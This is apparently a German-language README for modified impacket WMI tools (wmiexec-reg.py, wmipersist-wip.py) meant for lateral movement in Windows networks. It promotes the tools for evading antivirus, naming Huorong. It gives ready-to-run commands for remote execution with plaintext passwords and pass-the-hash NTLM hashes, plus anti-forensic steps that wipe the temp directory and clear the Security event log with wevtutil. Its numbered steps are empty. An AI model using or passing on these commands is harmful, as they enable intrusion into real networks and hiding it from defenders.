
Modifizierte Version von impacket wmiexec.py, erhalte Ausgabe (Daten, Antwort) aus der Registry, benötigt keine SMB-Verbindung, umgeht auch Antivirensoftware bei Lateral Movement wie WMIHACKER.
Modifizierte Version von impacket wmiexec.py, wmipersist.py. Holt Ausgabe (Daten, Antwort) aus der Registrierung, benötigt keine SMB-Verbindung, aber ich stecke im schlechten Code :(
Im ursprünglichen wmiexec.py wird die Antwort von der SMB-Verbindung (Port 445,139) geholt. Leider überwachen einige Antivirensoftware diese Ports als hohes Risiko.
In diesem Fall habe ich die SMB-Verbindungsfunktion entfernt und andere Methoden verwendet, um Befehle auszuführen.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration
Name: EnableAt
Type: REG_DWORD
Value: 1
wmipersist-wip.py (Sehr empfehlenswert, !!!funktioniert nur mit impacket v0.9.24!!!): Eine Python-Version von WMIHACKER, von der ich die VBS-Vorlage übernommen habe. Angreifer können es für laterale Bewegungen sicher unter laufender Antivirensoftware verwenden.
wmiexec-regOut.py: Nur ein einfaches Beispiel für die Win32_Process.create-Methode.
Schritt 1:
Schritt 2:
Schritt 3:
Schritt 4:
Schritt 5:
Schritt 1:
Schritt 2:
Schritt 3:
Im Allgemeinen müssen Sie nur das offizielle Impacket installieren.
Mit Klartext-Passwort
python3 wmiexec-reg.py administrator:[email protected] 'whoami'

Mit NTLM-Hashes
python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

Mit Klartext-Passwort (ohne Ausgabe)
python3 wmipersist-wip.py administrator:[email protected] 'command'

Mit NTLM-Hashes
python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 [email protected] 'whoami'

Mit Ausgabe
python3 wmipersist-wip.py administrator:[email protected] "whoami /priv" -with-output
python3 wmipersist-wip.py [email protected] "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

Unter Huorong Antiviren-Software (Verwendung der WMIHACKER VBS-Vorlage!!!)

Vergessen Sie nicht, das temporäre Verzeichnis nach dem Ausführen von Befehlen mit Ausgabe zu bereinigen.
Befehl: del /q /f /s C:\windows\temp\*

Befehl enthält doppelte Anführungszeichen.
Setzen Sie doppelte Anführungszeichen in einfache Anführungszeichen wevtutil cl '"security"'
